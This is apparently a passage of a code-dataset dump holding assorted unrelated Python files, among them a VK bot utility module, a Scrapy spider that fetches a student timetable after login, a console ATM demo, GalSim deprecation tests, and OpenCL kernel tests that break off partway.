seq_n = seq.split('_drive_')[1].split('_')[0]\n \n print(date, seq_n)\n generate_pose_file(basedir, date, seq_n, seq_path)","sub_path":"demos/demo_write_pose_file.py","file_name":"demo_write_pose_file.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"457188422","text":"class ProgramCmd:\n def __init__(self, norad_id, ground_station_id, start_date, end_date, observation_status, working_dir, payloads, waterfalls, demoddata, payload_modules, demoddata_modules, waterfall_modules):\n self.norad_id = norad_id\n self.ground_station_id = ground_station_id\n self.start_date = start_date\n self.end_date = end_date\n self.working_dir = working_dir\n self.payloads = payloads\n self.waterfalls = waterfalls\n self.demoddata = demoddata\n self.payload_modules = payload_modules\n self.demoddata_modules = demoddata_modules\n self.waterfall_modules = waterfall_modules\n self.observation_status = observation_status","sub_path":"domain/parameters/programCmd.py","file_name":"programCmd.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241646285","text":"import asyncio\nimport httpx\nfrom pprint import pprint\n\n\nasync def do_gets():\n resp = await httpx.get(\"https://httpbin.org/get\")\n pprint(resp.json())\n print(f\"Status 
Code: {resp.status_code}\")\n return resp\n\n\nasync def do_posts():\n # don't post any data\n resp = await httpx.post(\"https://httpbin.org/post\")\n pprint(resp.json())\n print(f\"Status Code: {resp.status_code}\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(do_gets())\n asyncio.run(do_posts())\n","sub_path":"async_example.py","file_name":"async_example.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359646706","text":"from tkinter import ttk\nfrom main_content_frames.data_section_frames.classes_section.classesWindow import ClassesWindow\nfrom main_content_frames.data_section_frames.webcam_section.dataWebcamSectionFrame import DataWebcamSectionFrame\n\n\n# a frame that contains the classes section inside the dataFrame\n# contains the scrollable class window and the \"add class\" button.\nclass ClassesSectionFrame(ttk.Frame):\n def __init__(self, container: ttk.Frame, webcam_section_frame: DataWebcamSectionFrame, **kwargs):\n super().__init__(container, **kwargs)\n\n # row & col config:\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # --layout--\n\n # row 0: scrollable classes window\n self.classes_window = ClassesWindow(self)\n self.classes_window.grid(row=0, column=0, padx=5, pady=5, sticky=\"NSEW\")\n\n # row 1: add class button\n # addClass button:\n add_button = ttk.Button(\n self,\n text=\"Add Class:\",\n command=lambda: self.classes_window.add_class(webcam_section_frame)\n )\n add_button.grid(row=1, column=0, padx=5, pady=5)\n","sub_path":"main_content_frames/data_section_frames/classes_section/classesSectionFrame.py","file_name":"classesSectionFrame.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628746812","text":"import argparse\n\nfrom collections import defaultdict\nfrom typing import Union\nfrom sentence_transformers import CrossEncoder\nfrom pathlib import Path\n\nfrom run_eval_sent_transformer import read_examples\n\n\ndef predict_sent_transformer(\n model: Union[str, CrossEncoder],\n input_file: Path,\n output_file: Path,\n batch_size: int,\n lower_case: bool\n):\n if type(model) == str:\n model = CrossEncoder(model)\n\n examples = read_examples(input_file, lower_case)\n input_texts = [example.texts for example in examples]\n\n scores = model.predict(input_texts, batch_size)\n\n # Get example with highest score per id\n best_scores = defaultdict(lambda: -1)\n best_instances = {}\n\n for example, score in zip(examples, scores):\n if score > best_scores[example.guid]:\n best_scores[example.guid] = score\n best_instances[example.guid] = example\n\n # Write final prediction\n writer = output_file.open(\"w\", encoding=\"utf8\")\n for id in sorted(best_instances.keys()):\n best_example = best_instances[id]\n writer.write(best_example.texts[1] + \"\\n\")\n writer.flush()\n\n writer.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, required=True)\n parser.add_argument(\"--input_file\", type=Path, required=True)\n parser.add_argument(\"--output_file\", type=Path, required=True)\n parser.add_argument(\"--bs\", type=int, default=8, required=False)\n parser.add_argument(\"--cased\", default=False, required=False, action=\"store_true\")\n\n args = parser.parse_args()\n\n predict_sent_transformer(\n model=args.model,\n input_file=args.input_file,\n output_file=args.output_file,\n 
batch_size=args.bs,\n lower_case=not args.cased\n )\n","sub_path":"predict_sent_transformer.py","file_name":"predict_sent_transformer.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"39584736","text":"from django.conf.urls import patterns, include, url\n\n\nurlpatterns = patterns(\"kiqlist.notifications.views\",\n\turl(r\"new/$\", \"new\"),\n\turl(r\"delete/$\", \"delete\"),\n\turl(r\"read/(?P\\d+)/$\", \"read\"),\n\turl(r\"all/$\", \"all\"),\n\turl(r\"mark_old$\", \"mark_as_old\")\n)\n","sub_path":"kiqlist/kiqlist/notifications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349916","text":"from dask.distributed import Client\nclient = Client(scheduler_file='scheduler.json')\n\nimport socket\nhost = client.run_on_scheduler(socket.gethostname)\n\ndef start_jlab(dask_scheduler):\n import subprocess\n proc = subprocess.Popen(['jupyter', 'lab', '--ip', host, '--no-browser'])\n dask_scheduler.jlab_proc = proc\n\nclient.run_on_scheduler(start_jlab)\n\nprint(\"ssh -N -L 8787:%s:8787 -L 8888:%s:8888 cheyenne.ucar.edu\" % (host, host))\n","sub_path":"setup-jlab.py","file_name":"setup-jlab.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"463944971","text":"# Copyright (c) 2012-2019 by the GalSim developers team on GitHub\n# https://github.com/GalSim-developers\n#\n# This file is part of GalSim: The modular galaxy image simulation toolkit.\n# https://github.com/GalSim-developers/GalSim\n#\n# GalSim is free software: redistribution and use in source and binary forms,\n# with or without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions, and the disclaimer given in the accompanying LICENSE\n# file.\n# 2. 
Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the disclaimer given in the documentation\n# and/or other materials provided with the distribution.\n#\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport numpy as np\n\nimport galsim\nfrom galsim_test_helpers import *\n\n\ndef check_dep(f, *args, **kwargs):\n \"\"\"Check that some function raises a GalSimDeprecationWarning as a warning, but not an error.\n \"\"\"\n # Check that f() raises a warning, but not an error.\n with assert_warns(galsim.GalSimDeprecationWarning):\n res = f(*args, **kwargs)\n return res\n\n\n@timer\ndef test_gsparams():\n check_dep(galsim.GSParams, allowed_flux_variation=0.90)\n check_dep(galsim.GSParams, range_division_for_extrema=50)\n check_dep(galsim.GSParams, small_fraction_of_flux=1.e-6)\n\n\n@timer\ndef test_phase_psf():\n atm = galsim.Atmosphere(screen_size=10.0, altitude=0, r0_500=0.15, suppress_warning=True)\n psf = atm.makePSF(exptime=0.02, time_step=0.01, diam=1.1, lam=1000.0)\n check_dep(galsim.PhaseScreenPSF.__getattribute__, psf, \"img\")\n check_dep(galsim.PhaseScreenPSF.__getattribute__, psf, \"finalized\")\n\n@timer\ndef test_interpolant():\n d = check_dep(galsim.Delta, tol=1.e-2)\n assert d.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, d, 'tol') == d.gsparams.kvalue_accuracy\n n = check_dep(galsim.Nearest, tol=1.e-2)\n assert n.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, n, 'tol') == n.gsparams.kvalue_accuracy\n s = check_dep(galsim.SincInterpolant, tol=1.e-2)\n assert s.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, s, 'tol') == s.gsparams.kvalue_accuracy\n l = check_dep(galsim.Linear, tol=1.e-2)\n assert l.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l, 'tol') == l.gsparams.kvalue_accuracy\n c = check_dep(galsim.Cubic, tol=1.e-2)\n assert c.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, c, 'tol') == c.gsparams.kvalue_accuracy\n q = check_dep(galsim.Quintic, tol=1.e-2)\n assert q.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, q, 'tol') == q.gsparams.kvalue_accuracy\n l3 = check_dep(galsim.Lanczos, 3, tol=1.e-2)\n assert l3.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l3, 'tol') == l3.gsparams.kvalue_accuracy\n ldc = check_dep(galsim.Lanczos, 3, False, tol=1.e-2)\n assert ldc.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, ldc, 'tol') == ldc.gsparams.kvalue_accuracy\n l8 = check_dep(galsim.Lanczos, 8, tol=1.e-2)\n assert l8.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l8, 'tol') == l8.gsparams.kvalue_accuracy\n l11 = check_dep(galsim.Interpolant.from_name, 'lanczos11', tol=1.e-2)\n assert l11.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l11, 'tol') == l11.gsparams.kvalue_accuracy\n\n@timer\ndef test_noise():\n real_gal_dir = os.path.join('..','examples','data')\n real_gal_cat = 'real_galaxy_catalog_23.5_example.fits'\n real_cat = galsim.RealGalaxyCatalog(\n dir=real_gal_dir, file_name=real_gal_cat, preload=True)\n\n test_seed=987654\n test_index = 17\n cf_1 = real_cat.getNoise(test_index, rng=galsim.BaseDeviate(test_seed))\n im_2, pix_scale_2, var_2 = real_cat.getNoiseProperties(test_index)\n # Check the variance:\n var_1 = cf_1.getVariance()\n assert var_1==var_2,'Inconsistent noise variance from getNoise and getNoiseProperties'\n # Check the image:\n ii = galsim.InterpolatedImage(im_2, normalization='sb', calculate_stepk=False,\n calculate_maxk=False, 
x_interpolant='linear')\n cf_2 = check_dep(galsim.correlatednoise._BaseCorrelatedNoise,\n galsim.BaseDeviate(test_seed), ii, im_2.wcs)\n cf_2 = cf_2.withVariance(var_2)\n assert cf_1==cf_2,'Inconsistent noise properties from getNoise and getNoiseProperties'\n\nif __name__ == \"__main__\":\n test_gsparams()\n test_phase_psf()\n test_interpolant()\n test_noise()\n","sub_path":"tests/test_deprecated.py","file_name":"test_deprecated.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"592047027","text":"import json\nimport os\nimport re\n\nimport datetime\n\nimport copy\nimport requests\n\nimport utils.vklib as vk\nimport utils.db_utils as db\nimport model as m\nimport consts as cnst\nimport config as cfg\n\n\ndef make_subs_file(uid):\n bot_followers = db.get_bot_followers()\n if len(bot_followers) == 0:\n text = 'В боте ещё нет подписчиков'\n vk.send_message(uid, text)\n return 'ok'\n filename = 'subs.csv'\n out = open(filename, 'a')\n text = 'ID; Имя; Статус; Подписан на рассылку\\n'\n out.write(text)\n for x in bot_followers:\n text = '{};{};{};{}\\n'.format(x.uid, x.name, x.status, x.mess_allowed)\n out.write(text)\n out.close()\n res = vk.get_doc_upload_server1(uid)\n print(res)\n upload_url = res['response']['upload_url']\n files = {'file': open(filename, 'r')}\n response = requests.post(upload_url, files=files)\n result = response.json()\n print(result)\n r = vk.save_doc(result['file'])\n vk_doc_link = 'doc{!s}_{!s}'.format(r['response'][0]['owner_id'], r['response'][0]['id'])\n print(vk_doc_link)\n os.remove(filename)\n return vk_doc_link\n\n\ndef get_group_count(group_id=cfg.group_id):\n members_count = vk.get_count_group_followers(group_id)\n return int(members_count)\n\n\ndef parse_group(members_count, group_id=cfg.group_id):\n follower_list = db.get_bot_followers(only_id=True)\n iterations = members_count // 1000 + 1\n users_added = 0\n for x in range(iterations):\n users = vk.get_group_memebers(group_id, offset=x * 1000, count=1000)\n for user_id in users:\n try:\n if not user_id in follower_list:\n username = vk.get_user_name(user_id)\n msg_allowed = 0\n if vk.is_messages_allowed(user_id):\n msg_allowed = 1\n db.add_bot_follower(user_id, username, msg_allowed=msg_allowed)\n users_added += 1\n except Exception as e:\n pass\n return users_added\n\n\ndef del_uid_from_dict(uid, dict_):\n if uid in dict_:\n del dict_[uid]\n\n\ndef send_message_admins(info):\n admins = db.get_list_bot_admins()\n vk.send_message_much(admins, cnst.NOTIFY_ADMIN.format(info.uid, info.name, info.email, info.number))\n\n\ndef send_message_admins_after_restart():\n admins = db.get_list_bot_admins()\n vk.send_message_much_keyboard(admins, cnst.MSG_SERVER_RESTARTED, create_keyboard_by_quiz())\n\n\ndef is_number_valid(number):\n match = re.fullmatch('^((8|\\+7)[\\- ]?)?(\\(?\\d{3}\\)?[\\- ]?)?[\\d\\- ]{7,9}', number)\n if match:\n return True\n else:\n return False\n\n\ndef is_email_valid(email):\n match = re.fullmatch('[\\w.-]+@\\w+\\.\\w+', email)\n if match:\n return True\n else:\n return False\n\n\ndef new_user_or_not(uid, uname):\n e = db.is_known_user(uid)\n if e or db.is_admin(uid):\n if e:\n db.set_bot_follower_mess_allowed(uid, 1)\n else:\n db.add_bot_follower(uid, uname, status=cnst.USER_NOT_SUB_STATUS, msg_allowed=1)\n vk.send_message_keyboard(uid, cnst.MSG_WELCOME.format(uname), cnst.KEYBOARD_USER)\n\n\ndef get_keyboard_from_list(list):\n keyboard = copy.deepcopy(cnst.keyboard_pattern.copy())\n c = 0\n 
for i in list:\n if c == 7:\n break\n one_btns = copy.deepcopy(cnst.one_button_pattern)\n one_btns[0]['action']['label'] = i\n j = {\"button\": 'K'}\n one_btns[0]['action']['payload'] = json.dumps(j)\n keyboard['buttons'].append(one_btns)\n c += 1\n # keyboard['buttons'].append(cnst.enroll_btn)\n return keyboard\n\n\ndef create_keyboard_by_quiz(for_admin=False):\n quiz = db.get_all_quiz()\n keyboard = copy.deepcopy(cnst.keyboard_pattern.copy())\n two_btns = copy.deepcopy(cnst.two_buttons_pattern)\n i = 1\n for c in quiz:\n if i == 1:\n two_btns = copy.deepcopy(cnst.two_buttons_pattern)\n two_btns[0]['action']['label'] = c.title\n j = {\"button\": 'K' + str(c.id)}\n two_btns[0]['action']['payload'] = json.dumps(j)\n i += 1\n else:\n two_btns[1]['action']['label'] = c.title\n j = {\"button\": 'K' + str(c.id)}\n two_btns[1]['action']['payload'] = json.dumps(j)\n keyboard['buttons'].append(two_btns.copy())\n i = 1\n if i == 2:\n if for_admin:\n two_btns[1]['action']['label'] = 'НАЗАД'\n else:\n one_btn = copy.deepcopy(cnst.one_button_pattern)\n one_btn[0]['action']['label'] = two_btns[0]['action']['label']\n two_btns = one_btn\n keyboard['buttons'].append(two_btns)\n elif for_admin:\n one_btn = copy.deepcopy(cnst.one_button_pattern)\n one_btn[0]['action']['label'] = 'НАЗАД'\n keyboard['buttons'].append(one_btn)\n return keyboard\n\n\ndef send_questions(uid, quiz):\n questions = db.get_questions_by_quiz(quiz)\n msg = 'Вопросы: \\n\\n'\n for q in questions:\n msg += '(ID-' + str(q.id) + ') '\n msg += q.qtext + '\\n'\n msg += q.answers + '\\n'\n msg += 'ОТВЕТ: ' + q.true_ans + '\\n'\n msg += q.photo_url + '\\n'\n msg += q.video_url + '\\n'\n msg += q.link_url + '\\n------------\\n\\n'\n vk.send_message(uid, msg)\n\n\ndef back_to_quiz_list(uid):\n keyboard = create_keyboard_by_quiz(for_admin=True)\n vk.send_message_keyboard(uid, 'Опросы', keyboard)\n\n\ndef send_question(uid, q):\n msg = '-----------------\\n' + q.qtext\n keyboard = get_keyboard_from_list(q.answers.split(', '))\n vk.send_message_keyboard(uid, msg, keyboard)\n if q.have_photo():\n vk.send_message_with_attach(uid, 'Фото:', q.photo_url)\n if q.have_video():\n vk.send_message_with_attach(uid, \"Видео:\", q.video_url)\n if q.have_link():\n print('_______________________---' + q.link_url)\n vk.send_message(uid, 'Ссылка: ' + q.link_url)\n\n\ndef get_mark(quiz, true_ans_count):\n marks_str = db.get_mark_by_quiz(quiz)\n marks_arr = marks_str.split('|')[:-1]\n for marr in marks_arr:\n mcrit = marr.split(' ')[0]\n min = int(mcrit.split('-')[0])\n max = int(mcrit.split('-')[1])\n mtext = marr.split(' ')[1]\n if true_ans_count >= min and true_ans_count <= max:\n return mtext\n return 'Нет оценки для этого результата'\n\n\ndef get_keyboard_true_ans(answers, true_ans, text):\n answers += ', {}'.format(cnst.BTN_NEXT)\n keyboard = get_keyboard_from_list(answers.split(', '))\n for btn in keyboard['buttons']:\n if btn[0]['action']['label'] == text:\n btn[0][\"color\"] = 'negative'\n if btn[0]['action']['label'] == true_ans:\n btn[0][\"color\"] = 'positive'\n if btn[0]['action']['label'] == cnst.BTN_NEXT:\n btn[0][\"color\"] = 'primary'\n return keyboard\n\n\ndef increase_last_mark_if_need(quiz):\n quest_count = len(db.get_questions_by_quiz(quiz))\n marks_str = db.get_mark_by_quiz(quiz)\n marks_arr = marks_str.split('|')[:-1]\n new_str_mark = ''\n i = 0\n for marr in marks_arr:\n new_str_mark = marr + '|'\n if i == len(marks_arr) - 1:\n mcrit = marr.split(' ')[0]\n min = int(mcrit.split('-')[0])\n max = int(mcrit.split('-')[1])\n if max > 
quest_count:\n                return\n            max += 1\n            mtext = marr.split(' ')[1]\n            new_last_mark = '{}-{} {}'.format(min, max, mtext)\n            new_str_mark = new_last_mark + '|'\n        i += 1\n    db.delete_mark(quiz)\n    db.add_new_mark(quiz, new_str_mark)\n\n\ndef isint(s):\n    try:\n        int(s)\n        return True\n    except ValueError:\n        return False\n","sub_path":"utils/service_utils.py","file_name":"service_utils.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"286318422","text":"# -*- coding: utf-8 -*-\r\nimport scrapy\r\nfrom scrapy.http import Request,FormRequest\r\nimport json\r\nfrom ..items import classScheduleItem,userItem\r\nfrom warehouse.models import user\r\nclass PachSpider(scrapy.Spider): # define the spider class; it must inherit from scrapy.Spider\r\n    name = 'urplogin' # set the spider name\r\n    allowed_domains = ['zhjw.scu.edu.cn'] # domains to crawl\r\n    # start_urls = ['http://edu.iqianyue.com/index_user_login.html'] # start URLs; only suitable for requests that need no login, because cookies etc. cannot be set\r\n    header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'} # set the browser user agent\r\n    logindata = {'j_username': '0', 'j_password': '0', 'j_captcha1': 'error'}\r\n    usermsg = userItem()\r\n\r\n    def __init__(self, logindata=None, *args, **kwargs):\r\n        super(PachSpider, self).__init__(*args, **kwargs)\r\n        self.logindata = json.loads(logindata)\r\n    def start_requests(self): # use the start_requests() method instead of start_urls\r\n        \"\"\"Request the login page once first, enabling cookies so that we receive a cookie, and set the callback\"\"\"\r\n\r\n        self.usermsg['userID'] = str(self.logindata['j_username'])\r\n        self.usermsg['userName'] = \"\"\r\n        self.usermsg['userPassword']=str(self.logindata['j_password'])\r\n        self.usermsg.save()\r\n        return [Request('http://zhjw.scu.edu.cn/login',meta={'cookiejar':1},callback=self.parse)]\r\n\r\n    def parse(self, response): # parse callback\r\n        # response cookies\r\n        Cookie1 = response.headers.getlist('Set-Cookie') # inspect the response cookies, i.e. the cookies the backend wrote to the browser the first time the page was visited\r\n        print(Cookie1)\r\n        print('登录中')\r\n        \"\"\"Second, send a form POST request carrying the cookie, browser agent and user login info to log in and get the cookie authorized\"\"\"\r\n        return [FormRequest.from_response(response,\r\n                                          url='http://zhjw.scu.edu.cn/j_spring_security_check', # the real POST address\r\n                                          meta={'cookiejar':response.meta['cookiejar']},\r\n                                          headers=self.header,\r\n                                          formdata=self.logindata,\r\n                                          callback=self.next,\r\n                                          )]\r\n    def next(self,response):\r\n        a = response.body.decode(\"utf-8\") # after logging in, you can inspect the login response\r\n        \"\"\"After login, request pages that require login to view, e.g. the personal center, carrying the authorized cookie\"\"\"\r\n        yield Request('http://zhjw.scu.edu.cn/student/courseSelect/thisSemesterCurriculum/ajaxStudentSchedule/callback',meta={'cookiejar':True},callback=self.next2)\r\n    def next2(self,response):\r\n        # request cookies\r\n        Cookie2 = response.request.headers.getlist('Cookie')\r\n        print(Cookie2)\r\n        rs=json.loads(response.body)\r\n        allmsg=rs['xkxx'][0]\r\n        for key in allmsg:\r\n            for sameclass in allmsg[key]['timeAndPlaceList']:\r\n                classSchedule = classScheduleItem()\r\n                classSchedule['userID'] = user.objects.get(userID=self.usermsg['userID'])\r\n                classSchedule['attendClassTeacher'] = allmsg[key]['attendClassTeacher']\r\n                classSchedule['courseName'] = allmsg[key]['courseName']\r\n                classSchedule['classroomName'] = sameclass['campusName']+sameclass['teachingBuildingName']+sameclass['classroomName']\r\n                classSchedule['weekDescription']= sameclass['weekDescription']\r\n                classSchedule['classDay'] = sameclass['classDay']\r\n                classSchedule['classSessions'] = sameclass['classSessions']\r\n                classSchedule['continuingSession'] = sameclass['continuingSession']\r\n                yield 
classSchedule\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"crawler/urpspider/build/lib/urpspider/spiders/urplogin.py","file_name":"urplogin.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"2243859","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom Atm.core import auth\nfrom Atm.core import transaction\nimport os\npath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# account data kept in memory\nuser_data = {'account_id':None,'is_authenticated':False,'account_data':None} # initially no username, not authenticated, no data\n\n@auth.login_acc\ndef account_info(acc_data):\n    print('''用    户:%s\n信用额度:\\033[031;1m%s\\033[0m\n余    额:\\033[031;1m%s\\033[0m'''%(acc_data['account_data']['id'],acc_data['account_data']['credit'],acc_data['account_data']['balance']))\n\n@auth.login_acc\ndef repay(acc_data):\n    '''\n    Repayment\n    :param acc_data: i.e. user_data\n    :return:\n    '''\n    print(\"---当前的帐户余额为\\033[031;1m%s\\033[0m---\"%acc_data['account_data']['balance'])\n    flag = True\n    while flag:\n        amount = input(\"请输入还款金额或按b返回:\")\n        if amount.isdigit() and len(amount)>0:\n            amount = int(amount)\n            print(\"还款\\033[031;1m%s\\033[0m\"%amount)\n            transaction.transaction(acc_data,'repay',amount)\n        elif amount == 'b':\n            flag = False\n        else:\n            print(\"输入错误\")\n\n@auth.login_acc\ndef withdraw(acc_data):\n    '''\n    Withdrawal\n    :param acc_data: i.e. user_data\n    :return:\n    '''\n    print(\"---当前的帐户余额为\\033[031;1m%s\\033[0m---\"%acc_data['account_data']['balance'])\n    flag = True\n    while flag:\n        amount = input(\"请输入取款金额或按b返回:\")\n        if amount.isdigit() and len(amount)>0:\n            amount = int(amount)\n            print(\"取款\\033[031;1m%s\\033[0m\"%amount)\n            transaction.transaction(acc_data,'withdraw',amount)\n        elif amount == 'b':\n            flag = False\n        else:\n            print(\"输入错误\")\n\n@auth.login_acc\ndef transfer(acc_data):\n    user = input(\"请输入要转入的账户:\")\n    user_file = \"%s/db/%s.json\"%(path,user)\n    if os.path.isfile(user_file):\n        flag = True\n        while flag:\n            amount = input(\"请输入金额:\")\n            if amount.isdigit() and len(amount)>0:\n                amount = int(amount)\n                print(\"向%s转账\\033[031;1m%s\\033[0m\"%(user,amount))\n                transaction.transaction(acc_data,'transfer',amount,user)\n                flag = False\n            elif amount == 'b':\n                flag = False\n            else:\n                print(\"输入错误\")\n                return\n    else:\n        print(\"所转的账户不存在\")\n\n@auth.login_acc\ndef pay_check(acc_data):\n    user_file = \"%s/log/%s.log\"%(path,acc_data['account_id'])\n    with open(user_file,'r')as f :\n        print(f.read())\n\n@auth.login_acc\ndef logout(acc_data):\n    exit()\n\n@auth.login_acc\ndef interactive(acc_data):\n    '''\n    Interactive menu selection\n    :param acc_data: the user data saved in the file\n    :return:\n    '''\n    menu_dict = {'1': account_info,\n                 '2': repay,\n                 '3': withdraw,\n                 '4': transfer,\n                 '5': pay_check,\n                 '6': logout}\n    menu = \"1. 账户信息\\n2. 还款\\n3. 取款\\n4. 转账\\n5. 账单\\n6. 
退出\"\n while True:\n print(menu)\n choise = input(\"请选择所需的操作:\")\n if choise in menu_dict:\n menu_dict[choise](acc_data)\n else:\n print(\"\\033[031;1m选择不存在,请重新输入\\033[0m\")\n\ndef run():\n '''\n 开始启动程序即调用此函数\n :return:\n '''\n acc_data = auth.user_login(user_data) #用于判断用户是否登陆的数据\n if user_data['is_authenticated']: #如果用户已经登陆,is_authenticated的值为True\n user_data['account_data'] = acc_data #将登陆的用户数据存入内存中的变量\n interactive(user_data)","sub_path":"Atm/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"549634917","text":"\"\"\"Tests for the OpenCL kernels.\"\"\"\nfrom .conftest import context_available\nfrom ..cl import kernel_source, get_context, pad\nfrom ..cl.utilities import DOUBLE_FP_SUPPORT\nimport numpy as np\nfrom peridynamics.neighbour_list import create_neighbour_list\nimport pyopencl as cl\nfrom pyopencl import mem_flags as mf\nimport pytest\n\n\ndef test_get_context():\n \"\"\"Test the get_context function.\"\"\"\n context = get_context()\n\n if type(context) == cl._cl.Context:\n devices = context.devices\n assert len(devices) == 1\n assert (devices[0].get_info(cl.device_info.DOUBLE_FP_CONFIG)\n & DOUBLE_FP_SUPPORT)\n else:\n assert context is None\n\n\nclass TestPad():\n \"\"\"Test padding helper function.\"\"\"\n\n def test_pad_1d(self):\n \"\"\"Test padding for a 1D array.\"\"\"\n dimension = 258\n group_size = 256\n expected_dimension = 512\n\n array = np.random.random(dimension)\n array = pad(array, group_size)\n\n assert array.shape == (expected_dimension,)\n assert np.all(\n array[dimension:] == np.zeros(expected_dimension-dimension)\n )\n\n def test_no_padding(self):\n \"\"\"Test padding when non is required.\"\"\"\n dimension = 512\n group_size = 256\n expected_dimension = 512\n\n array = np.random.random(dimension)\n array = pad(array, group_size)\n\n assert array.shape == (expected_dimension,)\n assert np.all(\n array[dimension:] == np.zeros(expected_dimension-dimension)\n )\n\n def test_pad_2d_axis0(self):\n \"\"\"Test padding a 2D array along axis 0.\"\"\"\n dimension = 755\n other_dimension = 5\n group_size = 256\n expected_dimension = 768\n\n array = np.random.random((dimension, other_dimension))\n array = pad(array, group_size)\n\n assert array.shape == ((expected_dimension, other_dimension,))\n assert np.all(\n array[dimension:, :] ==\n np.zeros((expected_dimension-dimension, other_dimension))\n )\n\n def test_pad_2d_axis1(self):\n \"\"\"Test padding a 2D array along axis 1.\"\"\"\n dimension = 400\n other_dimension = 17\n group_size = 256\n expected_dimension = 512\n\n array = np.random.random((other_dimension, dimension))\n array = pad(array, group_size, axis=1)\n\n assert array.shape == ((other_dimension, expected_dimension, ))\n assert np.all(\n array[:, dimension:] ==\n np.zeros((other_dimension, expected_dimension-dimension))\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef context():\n \"\"\"Create a context using the default platform, prefer GPU.\"\"\"\n return get_context()\n\n\n@context_available\n@pytest.fixture(scope=\"module\")\ndef queue(context):\n \"\"\"Create a CL command queue.\"\"\"\n return cl.CommandQueue(context)\n\n\n@context_available\n@pytest.fixture(scope=\"module\")\ndef program(context):\n \"\"\"Create a program object from the kernel source.\"\"\"\n return cl.Program(context, kernel_source).build()\n\n\n@context_available\ndef test_damage(context, queue, program):\n \"\"\"Test damage kernel.\"\"\"\n n_neigh = 
np.array([5, 5, 3, 0, 4, 5, 8, 3, 2, 1], dtype=np.int32)\n family = np.array([10, 5, 5, 1, 5, 7, 10, 3, 3, 4], dtype=np.int32)\n damage = np.empty(n_neigh.shape, dtype=np.float64)\n\n # Create buffers\n n_neigh_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n family_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=family)\n damage_d = cl.Buffer(context, mf.WRITE_ONLY, damage.nbytes)\n\n # Call kernel\n damage_kernel = program.damage\n damage_kernel(queue, family.shape, None, n_neigh_d, family_d, damage_d)\n cl.enqueue_copy(queue, damage, damage_d)\n\n damage_expected = (family - n_neigh) / family\n assert np.allclose(damage, damage_expected)\n\n\nclass TestForce():\n \"\"\"Test force calculation.\"\"\"\n\n @context_available\n def test_initial_force(self, context, queue, program):\n \"\"\"Ensure forces are zero when there is no displacement.\"\"\"\n r0 = np.array([\n [0.0, 0.0, 0.0],\n [1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [2.0, 0.0, 0.0],\n [0.0, 0.0, 1.0],\n ], dtype=np.float64)\n horizon = 1.1\n volume = np.ones(5, dtype=np.float64)\n bond_stiffness = 1.0\n max_neigh = 3\n nlist, n_neigh = create_neighbour_list(r0, horizon, max_neigh)\n\n force_expected = np.zeros((5, 3), dtype=np.float64)\n force_actual = np.empty_like(force_expected)\n\n # Create buffers\n r_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r0)\n r0_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r0)\n nlist_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=nlist)\n n_neigh_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n volume_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=volume)\n force_d = cl.Buffer(context, mf.WRITE_ONLY, force_expected.nbytes)\n\n # Call kernel\n 